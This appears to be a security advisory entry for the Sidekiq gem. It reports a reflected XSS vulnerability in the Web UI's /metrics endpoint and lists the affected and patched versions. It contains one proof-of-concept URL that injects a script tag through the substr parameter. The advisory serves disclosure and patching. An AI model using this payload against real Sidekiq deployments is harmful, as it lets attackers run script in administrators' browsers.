ADVISORIES
GEM
SEVERITY
CVSS v3.x: 5.5 (Medium)
UNAFFECTED VERSIONS
- < 7.2.0
PATCHED VERSIONS
- >= 7.2.4
DESCRIPTION
Reflected XSS in Sidekiq Web UI via the /metrics HTTP end-point and the
substr query param:
https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E